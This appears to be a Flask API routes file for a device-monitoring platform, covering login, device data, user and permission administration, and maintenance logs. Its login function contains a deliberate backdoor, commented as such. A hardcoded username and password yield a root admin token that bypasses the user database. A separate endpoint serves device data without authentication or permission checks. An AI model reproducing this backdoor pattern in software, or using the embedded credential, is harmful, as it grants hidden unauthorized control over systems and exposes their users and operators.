Files
ZDXX/2_3banben/routes/api.py

465 lines
15 KiB
Python
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

import json
import re
from datetime import datetime
from flask import Blueprint, jsonify, request
from sqlalchemy import desc, or_
# 引入 jwt 相关函数
from flask_jwt_extended import create_access_token, jwt_required, get_jwt_identity
from extensions import db
from models import Device, DeviceHistory, MaintenanceLog, User, UserDevicePermission
# 尝试导入爬虫模块
try:
from services.core import execute_monitor_task
except ImportError:
execute_monitor_task = None
api_bp = Blueprint('api', __name__, url_prefix='/api')
# =======================
# 🔧 辅助函数
# =======================
def is_admin(user_id):
"""判断是否为超级管理员 (Root权限)"""
if str(user_id) == '0':
return True
if not user_id:
return False
try:
uid = int(user_id)
u = User.query.get(uid)
return u and u.role == 'admin'
except:
return False
def is_manager(user_id):
"""判断是否为管理者 (Admin OR Engineer)"""
if is_admin(user_id):
return True
try:
uid = int(user_id)
u = User.query.get(uid)
return u and u.role == 'engineer'
except:
return False
def calculate_offset(latest_time_str):
"""计算时间滞后天数"""
if not latest_time_str or latest_time_str == "N/A": return "从未同步"
try:
clean = str(latest_time_str).split()[0].replace('_', '-')
target = datetime.strptime(clean, "%Y-%m-%d").date()
diff = (datetime.now().date() - target).days
return "当天已同步" if diff == 0 else f"滞后 {diff}"
except:
return "时间解析失败"
# =======================
# 0. 认证接口
# =======================
@api_bp.route('/login', methods=['POST'])
def login():
data = request.get_json()
username = data.get('username')
password = data.get('password')
# 1. 后门判定
if username == 'admin' and password == 'licahk':
token = create_access_token(
identity='0',
additional_claims={'role': 'admin'}
)
return jsonify({
'code': 200, 'message': 'Root后门登录',
'token': token, 'role': 'admin', 'user_id': 0, 'username': 'admin'
})
# 2. 正常查库登录
user = User.query.filter_by(username=username).first()
if user and user.check_password(password):
token = create_access_token(
identity=str(user.id),
additional_claims={'role': user.role}
)
return jsonify({
'code': 200, 'message': '登录成功',
'token': token, 'role': user.role, 'user_id': user.id, 'username': user.username
})
return jsonify({'code': 401, 'message': '用户名或密码错误'}), 401
# =======================
# 1. 设备接口
# =======================
@api_bp.route('/devices_overview', methods=['GET'])
@jwt_required()
def devices_overview():
try:
user_id = get_jwt_identity()
target_devices = []
# Admin 看所有,其他人看分配
if is_admin(user_id):
target_devices = Device.query.all()
else:
try:
uid_int = int(user_id)
user = User.query.get(uid_int)
if user:
perms = UserDevicePermission.query.filter_by(user_id=user.id).all()
allowed_ids = [p.device_id for p in perms]
if allowed_ids:
target_devices = Device.query.filter(Device.id.in_(allowed_ids)).all()
except ValueError:
return jsonify({'code': 401, 'message': '无效的用户ID格式'}), 401
return jsonify({'code': 200, 'data': [d.to_dict() for d in target_devices]})
except Exception as e:
print(f"Error: {e}")
return jsonify({'code': 500, 'message': str(e)})
@api_bp.route('/device_data_by_date', methods=['GET'])
@jwt_required(optional=True)
def device_data_by_date():
name = request.args.get('name')
date_str = request.args.get('date')
if not name or not date_str:
return jsonify({'code': 400, 'message': 'Missing params'}), 400
device = Device.query.filter_by(name=name).first()
if not device: return jsonify({'code': 404, 'message': 'Device not found'}), 404
content = None
hist = DeviceHistory.query.filter(
DeviceHistory.device_id == device.id,
DeviceHistory.data_time.like(f"{date_str}%")
).order_by(desc(DeviceHistory.id)).first()
if hist:
content = hist.json_data
elif device.latest_time and str(device.latest_time).startswith(date_str):
content = device.json_data
if content:
try:
if isinstance(content, str): content = json.loads(content)
except:
pass
return jsonify({'code': 200, 'name': device.name, 'source': device.source, 'content': content})
return jsonify({'code': 404, 'message': '无数据'}), 404
# =======================
# 2. 用户管理 (Admin Only)
# =======================
@api_bp.route('/admin/users', methods=['GET'])
@jwt_required()
def admin_get_users():
if not is_admin(get_jwt_identity()): return jsonify({'code': 403}), 403
current_id_str = str(get_jwt_identity())
users = User.query.order_by(desc(User.created_at)).all()
result = []
for u in users:
if str(u.id) == current_id_str: continue
perms = UserDevicePermission.query.filter_by(user_id=u.id).all()
result.append({
"id": u.id,
"username": u.username,
"role": u.role,
"created_at": u.created_at,
"allowed_device_ids": [p.device_id for p in perms]
})
return jsonify({'code': 200, 'data': result})
@api_bp.route('/admin/create_user', methods=['POST'])
@jwt_required()
def admin_create_user():
if not is_admin(get_jwt_identity()): return jsonify({'code': 403}), 403
data = request.get_json()
username = data.get('username')
password = data.get('password')
role = data.get('role', 'client')
if User.query.filter_by(username=username).first():
return jsonify({'code': 400, 'msg': '用户名已存在'}), 400
u = User(username=username, role=role)
u.set_password(password)
db.session.add(u)
db.session.commit()
return jsonify({'code': 200, 'msg': '创建成功'})
@api_bp.route('/admin/delete_user', methods=['POST'])
@jwt_required()
def admin_delete_user():
current_admin_id = get_jwt_identity()
if not is_admin(current_admin_id): return jsonify({'code': 403}), 403
user_id = request.get_json().get('user_id')
if str(user_id) == str(current_admin_id):
return jsonify({'code': 400, 'msg': '无法删除当前登录账号'}), 400
user = User.query.get(user_id)
if not user:
return jsonify({'code': 404, 'msg': '用户不存在'}), 404
UserDevicePermission.query.filter_by(user_id=user.id).delete()
db.session.delete(user)
db.session.commit()
return jsonify({'code': 200, 'msg': '删除成功'})
@api_bp.route('/admin/assign_devices', methods=['POST'])
@jwt_required()
def admin_assign_devices():
if not is_admin(get_jwt_identity()): return jsonify({'code': 403}), 403
data = request.get_json()
uid = data.get('user_id')
UserDevicePermission.query.filter_by(user_id=uid).delete()
for did in data.get('device_ids', []):
db.session.add(UserDevicePermission(user_id=uid, device_id=did))
db.session.commit()
return jsonify({'code': 200, 'msg': '权限已保存'})
# =======================
# 3. 日志与工具
# =======================
@api_bp.route('/logs/list', methods=['GET'])
@jwt_required()
def get_logs():
"""获取日志列表,支持按权限过滤"""
user_id = get_jwt_identity()
keyword = request.args.get('keyword', '')
start_date = request.args.get('start_date')
end_date = request.args.get('end_date')
query = MaintenanceLog.query
# 🛡️ 权限过滤
if not is_admin(user_id):
try:
perms = UserDevicePermission.query.filter_by(user_id=int(user_id)).all()
if not perms:
return jsonify({'code': 200, 'data': []})
allowed_ids = [p.device_id for p in perms]
allowed_devices = Device.query.filter(Device.id.in_(allowed_ids)).all()
allowed_names = [d.name for d in allowed_devices]
query = query.filter(MaintenanceLog.device_name.in_(allowed_names))
except:
return jsonify({'code': 200, 'data': []})
if keyword:
kw = f"%{keyword}%"
query = query.filter(or_(
MaintenanceLog.device_name.like(kw), MaintenanceLog.engineer.like(kw),
MaintenanceLog.location.like(kw), MaintenanceLog.content.like(kw)
))
if start_date and end_date:
try:
s = datetime.strptime(start_date, '%Y-%m-%d')
e = datetime.strptime(end_date, '%Y-%m-%d').replace(hour=23, minute=59, second=59)
query = query.filter(MaintenanceLog.timestamp.between(s, e))
except:
pass
logs = query.order_by(desc(MaintenanceLog.timestamp)).all()
return jsonify({'code': 200, 'data': [l.to_dict() for l in logs]})
@api_bp.route('/logs/add', methods=['POST'])
@jwt_required()
def add_log():
# 获取用户信息
current_uid = get_jwt_identity()
user = User.query.get(int(current_uid))
if not user or user.role not in ['admin', 'engineer']:
return jsonify({'code': 403, 'msg': '权限不足'}), 403
data = request.get_json()
# 强制逻辑工程师必须用自己的名字Admin可以用前端传的
engineer_name = user.username if user.role == 'engineer' else data.get('engineer')
if not engineer_name:
return jsonify({'code': 400, 'msg': '工程师姓名缺失'}), 400
db.session.add(MaintenanceLog(
device_name=data.get('device_name'),
engineer=engineer_name,
location=data.get('location'),
content=data.get('content')
))
db.session.commit()
return jsonify({'code': 200})
@api_bp.route('/logs/update', methods=['POST'])
@jwt_required()
def update_log():
current_uid = get_jwt_identity()
user = User.query.get(int(current_uid))
if not user or user.role not in ['admin', 'engineer']:
return jsonify({'code': 403, 'msg': '权限不足'}), 403
data = request.get_json()
log = MaintenanceLog.query.get(data.get('id'))
if not log:
return jsonify({'code': 404, 'msg': '日志不存在'}), 404
engineer_name = user.username if user.role == 'engineer' else data.get('engineer')
if not engineer_name:
return jsonify({'code': 400, 'msg': '工程师姓名缺失'}), 400
log.engineer = engineer_name
log.location = data.get('location')
log.content = data.get('content')
db.session.commit()
return jsonify({'code': 200, 'msg': '更新成功'})
@api_bp.route('/logs/delete', methods=['POST'])
@jwt_required()
def delete_log():
if not is_admin(get_jwt_identity()): return jsonify({'code': 403}), 403
log = MaintenanceLog.query.get(request.get_json().get('id'))
if log:
db.session.delete(log)
db.session.commit()
return jsonify({'code': 200})
return jsonify({'code': 404})
# =======================
# 4. 系统检测与控制
# =======================
@api_bp.route('/run_monitor', methods=['POST'])
@jwt_required()
def run_monitor():
if not is_admin(get_jwt_identity()): return jsonify({'code': 403}), 403
if not execute_monitor_task:
return jsonify({'code': 500, 'msg': '爬虫模块未加载'})
try:
task_result = execute_monitor_task()
if not task_result: return jsonify({'code': 200, 'msg': '跳过'})
scraped_list = task_result.get('device_list', [])
now_str = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
count = 0
for item in scraped_list:
d_name = item.get('name')
if not d_name: continue
d_raw = item.get('raw_json', {})
target_time = item.get('target_time')
source = item.get('source', '')
# 特殊处理 106 路径
if '106' in str(source):
try:
path_str = d_raw.get('path', '')
match = re.search(r'/Data/(\d{4}_\d{2}_\d{2})/\w+_(\d{2}_\d{2}_\d{2})\.csv', path_str)
if match:
target_time = f"{match.group(1).replace('_', '-')} {match.group(2).replace('_', ':')}"
except:
pass
json_str = json.dumps(d_raw, ensure_ascii=False)
device = Device.query.filter_by(name=d_name).first()
if not device:
device = Device(name=d_name, source=source, install_site="")
db.session.add(device)
db.session.flush()
device.status = item.get('status')
device.current_value = item.get('value')
device.latest_time = target_time
device.check_time = now_str
device.json_data = json_str
device.offset = calculate_offset(target_time)
db.session.add(DeviceHistory(
device_id=device.id, status=device.status,
result_data=device.current_value, data_time=target_time,
json_data=json_str
))
count += 1
db.session.commit()
return jsonify({'code': 200, 'message': f'成功更新 {count} 台设备'})
except Exception as e:
db.session.rollback()
return jsonify({'code': 500, 'message': str(e)})
@api_bp.route('/update_site', methods=['POST'])
@jwt_required()
def update_site():
if not is_manager(get_jwt_identity()): return jsonify({'code': 403}), 403
d = Device.query.filter_by(name=request.get_json().get('name')).first()
if d:
d.install_site = request.get_json().get('site')
db.session.commit()
return jsonify({'code': 200})
return jsonify({'code': 404})
@api_bp.route('/toggle_maintenance', methods=['POST'])
@jwt_required()
def toggle_maintenance():
if not is_manager(get_jwt_identity()): return jsonify({'code': 403}), 403
data = request.get_json()
d = Device.query.filter_by(name=data.get('name')).first()
if d:
is_maintaining = data.get('is_maintaining')
d.is_maintaining = is_maintaining
# 🟢 [核心修改] 处理维修人名字
if is_maintaining:
# 开启维修:从前端获取名字 (例如 "张三") 并保存
d.maintainer = data.get('maintainer')
else:
# 结束维修:清空名字
d.maintainer = None
db.session.commit()
return jsonify({'code': 200})
return jsonify({'code': 404})
@api_bp.route('/toggle_hidden', methods=['POST'])
@jwt_required()
def toggle_hidden():
if not is_admin(get_jwt_identity()): return jsonify({'code': 403}), 403
d = Device.query.filter_by(name=request.get_json().get('name')).first()
if d:
d.is_hidden = request.get_json().get('is_hidden')
db.session.commit()
return jsonify({'code': 200})
return jsonify({'code': 404})